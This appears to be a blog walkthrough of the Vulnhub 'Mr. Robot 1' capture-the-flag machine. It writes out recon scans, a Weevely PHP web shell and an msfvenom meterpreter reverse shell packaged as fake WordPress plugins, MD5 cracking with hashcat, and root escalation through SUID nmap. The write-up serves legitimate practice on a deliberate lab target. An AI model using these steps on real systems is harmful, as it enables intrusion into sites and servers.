Today I am taking a look at Vulnhub VM based on the show Mr. Robot. Coincidentally the name of the VM is MR. Robot 1. The goal is to find three keys hidden in different locations. Throughout the game things are getting progressively more difficult as you hunt down the keys. This game is considered beginner-intermediate and you don’t have to do anything hardcore to beat it.

Let’s start, shall we?

Test lab environment

When playing games such as this I use my own test lab. I’ve been using VMWare and Kali Linux for years. Due to hardware and software issues I decided to switch everything out in favor of Virtual Box and Parrot OS. I’ll do the hacking part from Parrot exclusively. I recommend to setup a similar environment before playing.

Walkthrough

Finding the most basic information

The very first thing I had to do was to uncover the target IP-address. Luckily my test lab has few machines in it, so finding the target was a breeze using this command:

$ netdiscover

Key 1

Finding open ports

I knew very little about this target. A great way to learn more about a target is to have a look at which ports that is in open state using Nmap:

$ nmap -p1-65535 -A -T4 -sS -sU target_ip

Nmap found out that ports 80 and 443 were open.

Investigating the web environment

Still not knowing much about the target I needed to find out more. Better make use of Nikto which is a great tool to learn more about the targets web-environment:

$ nikto -output MrRobot.xml -host target_ip

From Nikto’s output I learnt that:

  • WordPress is installed on server
  • license.txt is present
  • robots.txt is present
  • … and it uses Apache web server

Those .txt files looked pretty interesting, so I downloaded them for closer inspection:

$ wget http://target_ip/license.txt
$ wget http://target_ip/robots.txt
Investigating license.txt

This file had a Base64 encoded string in it. I quickly decoded it while still in the terminal:

$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode

String decodes to elliot:ER28-0652.

Investigating robots.txt

This file contained two interesting entries. First, the key to level 1. Second, a dictionary of some sort. Downloading them both for later use:

$ wget http://target_ip/fsociety.dic
$ wget http://target_ip/key-1-of-3.txt

Key 1 retrieved!

Key 2

WPScan

Finding basic information about the WordPress installation using WPScan:

$ wpscan --url target_ip

Yielded

  • robots.txt (which I already had downloaded)
  • WordPress version
Enumerating users

Trying to enumerate the WordPress users:

$ wpscan --enumerate u[0-10000] --url target_ip

Yielded no results, neither using username elliot directly (as I found earlier).

Enumerating plugins

Plugins are a great source for finding ways in, often they leak interesting information too. Enumerating lets me find out which plugins the site uses:

$ wpscan --url target_ip --enumerate p

Wpscan spat out plenty of useful information and frankly, I wasn’t in the mood to go any further with this information. Instead I went on to log in with credentials elliot:ER28-0652 at wp-login – instant success!

Logged in

Looked around. It’s a plain WordPress installation. Decided to try getting shell. Being closer to core is more interesting.

Shell

The first thing that struck me was that a shell made using Weevely would be killer!

$ weevely generate 12345 shelly.php

The plan is to sneak the shell on the server by using the plugin installation tool in WordPress. In order to do so, the shell must be prepped to appear as a proper plugin. Adding WordPress related plugin comments into beginning of shelly.php:

<?php

/*
Plugin Name: Shelly
Plugin URI: http://localhost  
Description: Bla Bla Bla  
Author: Pingmoose
Version: 1.0.1  
Author URI: http://localhost  
*/

... PHP_SHELL_CODE ...

?>

Making it a plugin package for WordPress’s plugin installation tool by zipping it:

$ zip shelly.zip shelly.php

Then went on to install it as a WordPress plugin installation. After that, connected Weevely to shell:

$ weevely http://target_ip/wp-content/plugins/shelly/shelly.php 12345

While in shell:

$ cd /home
$ ls
$ cd /home/robot
$ ls

This lead to the discovery of key-2-of-3.txt. I couldn’t read it due to missing permission. However, a file named password.raw-md5 in this directory was readable.

Cracking password.raw-md5

The filename clearly stated I had to deal with a MD5 hash. I could have gone lazy using Rainbow Tables on this one, fat chance it has already been cracked. But that would be too easy, wouldn’t it? Instead I chose to crack it using the RockYou wordlist and the magnificent Hashcat tool.

$ cp /usr/share/wordlists/rockyou.txt.gz Hacking/
$ gunzip rockyou.txt.gz
$ hashcat -m 0 -a 1 key2passwordhash.txt ~/Hacking/rockyou.txt

Maybe I could su - robot using this password. Nope, my shell couldn’t handle that … I needed a better one.

Creating a second shell

Trying the Metasploit and MSFVenom route. Listed options in MSFVenom in Parrot:

$ msfvenom -l | grep php

Creating shell:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=target_ip LPORT=7771 -f raw -o meterpreter.php

Added WordPress headers, zipped it and installed it – the same routine as earlier.

Listener setup in Metasploit:

$ msfconsole
$ use exploit/multi/handler
$ set LHOST my_ip
$ set LPORT 7771
$ run

In order to make the shell connect back to my attacking computer I had to manually visit:

http://target_ip/wp-content/plugins/meterpreter/meterpreter.php

Back in Metasploit:

$ shell

Then spawn a shell so I could do more work (typed directly into Metasploit):

$ python -c 'import pty;pty.spawn("/bin/bash")'

Waited for shell to come alive. Then

$ cd /home/robot
$ su - robot (using the password I cracked from the MD5 file)
$ cat Key-2-of-3.txt

Success!

Key 3

Still in my spawned shell, I tried to find a way to become ROOT

Finding programs that can be used for escalation

$ find / -perm +6000 2> /dev/null

Found an old version of NMAP. Trying to exploit the interactive part:

$ /usr/local/bin/nmap --interactive
$ !sh
$ whoami
$ cd /root; ls;
$ cat Key-3-of-3.txt

Challenge done!

Advertisements